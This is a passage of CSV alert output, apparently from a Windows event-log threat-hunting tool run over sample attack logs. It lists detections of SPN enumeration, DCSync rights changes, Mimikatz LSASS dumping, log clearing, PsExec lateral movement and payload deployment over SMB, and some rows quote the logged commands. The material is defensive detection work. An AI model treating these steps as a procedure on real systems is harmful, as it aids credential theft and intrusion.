Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account 
manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 08:07:21.231 
+09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The 
Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin 
Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec 
remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 22:30:00.589 +09:00,-,-,low,Rare Schtasks Creations,[condition] 
count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\eviltask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx 